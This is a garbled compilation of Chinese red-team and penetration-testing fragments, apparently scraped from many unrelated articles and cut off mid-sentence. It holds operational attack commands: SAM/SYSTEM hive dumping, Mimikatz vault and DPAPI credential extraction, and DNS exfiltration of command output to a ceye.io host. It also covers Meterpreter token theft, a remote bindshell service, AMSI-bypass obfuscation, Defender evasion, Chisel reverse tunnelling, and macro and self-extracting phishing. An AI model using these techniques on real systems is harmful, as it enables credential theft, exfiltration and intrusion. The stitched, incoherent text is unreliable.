----Micropoor 密码窃取 注册表读取密码 ---- 注册表读取密码主要获取的是两个文件: reg save HKLM\SYSTEM Sys.hiv reg save HKLM\SAM Sam.hiv 每个软件都使用不同的技术(明文,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。 域里面存在域控制器的c:\windows\ntds\ntds.dit中 ntds.dit其实就是一个esent数据库,微软本身就有一系列的文档化api能够操作这个数据库。
使用CredSniper窃取红队行动中的2FA令牌Mike Felch // 随着越来越多组织强制要求使用双因素认证(2FA)来访问GSuite和OWA等外部服务,红队和渗透测试团队需要创新技术来捕获2FA CredSniper正是在红队行动中应运而生的工具,能够高效获取凭证和2FA令牌,甚至适用于技术资深的高级员工。CredSniper简介钓鱼攻击已存在多年,多数组织已开始在日常培训中提高员工安全意识。 HTTPS的必要性使用HTTPS不仅保护目标凭证不被非安全站点窃取,还能避免克隆门户因质量低劣而被识别为钓鱼站点。 模块化认证门户CredSniper内置GSuite模块,用户也可快速创建新模块(约5-10分钟)。模块定义了模板与路由的映射关系,例如访问/login时会加载认证流程相应阶段的模板。 两者均为红队行动提供了强大支持。相关链接: CredSniper GitHub Evilginx2 GitHub
在Windows上使用prtsc键时,taskhost/taskhostw会试图获得对一个不存在的文件的读取权限。
通常,红队参与不仅仅是实现域管理员。一些客户希望查看域中的特定用户是否会受到威胁,例如 CEO。
以及垃圾数据 ? 3.至于对抗waf,最重要的是要清楚waf的规则,拦截的参数,再来进一步绕过,具体可以参考我的上一篇文章。 4.遇到一个cms存在盲注,数据出的很慢,我们可以自己本地搭建一个,查看账号密码放在哪个表单。 5.比如一个登录框,登陆的时候叫你选部门,可能账号密码处没有注入,但是你从人事部选择技术部这一步抓包,就会有注入。 4.看看有没有.user.ini这个文件,有的话走大运 5.白名单,这类没有解析漏洞或者开发商本身的漏洞,就别想着绕过了。 本机的网络环境,c段的web资源,数据库位置,信任域(前提是我们是在域环境),等这类东西。 最后在是我们的密码,凭证。
大多数C2框架都有内置的功能(如Cobalt Strike中的 "窃取令牌 "功能)。 # Show tokens on the machine . 滥用 MSSQL 数据库进行横向移动 MSSQL 数据库可以链接,这样如果你破坏一个数据库,你可以在特定用户的上下文中对其他数据库执行查询(甚至操作系统命令)如果这样配置,它甚至可以用来遍历森林边界 如果我们有 SQL 执行,我们可以使用以下命令来枚举数据库链接。 ,并收集有关(可访问的)数据库的更多信息。 我们还可以在链接的数据库上自动查找和执行查询或命令(甚至通过多层数据库链接)。
char buf_msg[BUF_SIZE]; //传递的最大字节数 DWORD dwRcv; //实际接收到的字节数 //创建命名管道,命名为MyPipe,消息只能从客户端流向服务器,读写数据采用阻塞模式 \n"); memset(buf_msg, 0, BUF_SIZE); //读取数据 while(1) { if (::ReadFile(hPipe, buf_msg, BUF_SIZE, &dwRcv
NULL || HookProc == NULL) { printf("地址填错了"); return 0; } if (num < 5) 存起来把原来的值 memset(HookAddr,0x90,num); //先全部nop //计算跳到我们自己函数的硬编码,E9后面的值 = 要跳转的地址 - E9的地址 - 5 DWORD JmpAddr = (DWORD)HookProc - (DWORD)HookAddr - 5; *(LPBYTE)HookAddr = 0xE9; *(PDWORD //等会的返回地址 dw_ifHOOK = 1; } 这里别忘了改属性,然后就是有个公式,JMP后面的值并不是我们真正想要去的地址 E9后面的值 = 要跳转的地址 - E9的地址 - 5, 用函数名传参的话得到的并不是真正的函数地址,但其实也是个间接地址嘛,JMP + 真正函数地址经过运算后的地址,我们还是用“E9后面的值 = 要跳转的地址 - E9的地址 - 5”这个公式算一下。
前言 涵盖了现在大多数红队钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜! 1. excel宏执行任意命令 新建一个exel表,然后打开,对准这个右键点击插入宏。 ? 5. 自解压钓鱼 我这里就用刚刚改好的木马了,创建自解压文件: ? 点击高级,自解压选项,常规,设置自解压路径 ? 点击设置,设置解压后运行文件的路径 ? 模式选择全部隐藏 ?
大家好,我是风起,最近一直在做安全研究及Kunyu的开发维护,已经好久没有写红队攻防相关的文章了,那么近期将带来 “红队实战攻防技术” 系列的文章。 当前行业内组织的 “红蓝对抗演习” 在检验企业安全的同时也在磨练技术人员的技术水平,在近几年的演习中可以发现攻防双方的水准都有了极大的提升,本文将以红队的视角去阐述技术思想。 与常规的渗透测试相比,红队攻防更多的是渗透思想上的差异,而我个人的理解认为 “隐蔽”、“持久化”是最重要的思想,如何做到快速、高效的拿下目标,隐蔽、持久的进一步操作,也正是核心的差异所在。 熟悉我的读者,一定看过之前 “红队攻防基础建设” 相关的文章,本文也会串联之前知识点灵活的运用到实战场景下。 对于一些新晋红队的同学,风起哥建议首先做好基础建设,比如免杀、隐匿、工具特征改造、匿名VPS、邮箱、手机号、身份信息等,最好在纯净的虚拟机中进行渗透操作(别搁虚拟机里看什么腾讯视频)。
such as stored creds for scheduled tasks (elevate first) vault::list vault::cred /patch 使用 Mimikatz 滥用数据保护 previous step) dpapi::masterkey /rpc /in:C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Protect\S-1-5- Local\Microsoft\Credentials\1EF01CC92C17C670AC9E57B53C9134F3 /masterkey:91721d8b1ec[...]e0f02c3e44deece5f318ad
一天一靶机 生活充实而有趣,打算这几天把红日的几个靶机都给撸个遍。打起来还挺有意思。
如果将恶意文件命名为 DumpStack.log,Defender 不会对其进行扫描。
ping pwd|tr -d '\n'|xxd -ps.is1lv6.ceye.io base64原理和上面类似,主要是对值进行base64编码,然后替换掉“=”,即可成功外带数据。 pingpwd|base64|tr -d ‘=’.is1lv6.ceye.io 如果有多行数据需要外带,那么请考虑下面的语句。 2 #选择网卡 开始抓包 sniffer_stats 2 #查看状态 sniffer_dump 2 /tmp/lltest.pcap #导出pcap数据包 sniffer_stop 2 需使用\\ execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell rev2self #返回原始token # 2.steal_token窃取令牌 steal_token <pid值> #从指定进程中窃取token 先ps,找域控进程 drop_token #删除窃取的token 植入后门 Meterpreter仅仅是在内存中驻留的Shellcode
RequestTemplate是一款两端并用的红队渗透工具以及甲方自查工具,其在内网渗透过程中有着不可替代的作用。 客户端用Golang以其精巧、快速的特点打造而成,快速发现内网中脆弱的一环。 项目地址: https://github.com/1n7erface/RequestTemplate 0x01 应用场景 红蓝对抗中红队的内网利器 甲方建设中内网的自查帮手 0x02 具备特点 网段探测
接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该文章都能学习到一些红队的技巧和知识。 Burpsuiter解密HTML:kali自带Burpsuiter工具 在Burpsuiter打开后在Decoder处进行HTML破解获取 最终账号密码:boris/InvincibleHack3r 5、 5、暴力破解doak用户 和之前暴力破解一样的性质,继续暴力破解doak用户。 或者用strings获取jpg文件底层内容:strings for-007.jpg 用以上命令都可以查看到base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ== 9、Base64解码 使用 五、总结 通过以上的学习,我们认知了一些红队的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap、hysra、pop3-nc、MSF、EXP等等的编译和使用提权等,
GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.' 目的 Invoke-CradleCrafter 的存在是为了帮助蓝队和红队轻松探索、生成和混淆 PowerShell 远程下载托架。
前言 域内横向移动技术是红队作战在域内最基本技术之一,红队人员会利用该技术,以被攻陷的系统为跳板,通过已经收集的凭据和密码,来访问域内其他主机,扩大战果,最终目的是获取到dc的访问控制权限。 bindshell binpath= "c:\Gamma.exe" 4.立即启动该服务: sc \\WIN-ENS2VR5TR3N start bindshell 5.使用完后删除刚才创建的服务 sc 3.客户端连接执行命令,服务端启动相应的程序并执行回显数据。 4.运行完后删除服务。 ” 是基于WinRM脚本API,而这个api使我们使能够从远程计算机执行WS-Management协议操作和获得数据。 即使WinRM服务正在运行,也无法接收或发送请求数据的WS-Management协议消息。 Internet连接防火墙(ICF)阻止访问端口。
Metasploit带有内置的后期漏洞利用功能,可帮助我们完成任务。由于它是后渗透的模块,因此只需要输入会话即可:
在我们的攻击机器上(本例中为Linux),我们以反向SOCKS5模式在80端口启动一个Chisel服务器。 sudo . /chisel server -p 80 --reverse --socks5 在我们被攻击的目标系统上,我们连接到这个服务器,并告诉它通过反向SOCKS5隧道代理所有流量。 . TightVNC\Server -Name "Password" | select -ExpandProperty Password 此外,别忘了用sqlcmd或Invoke-SqlCmd来列举任何本地数据库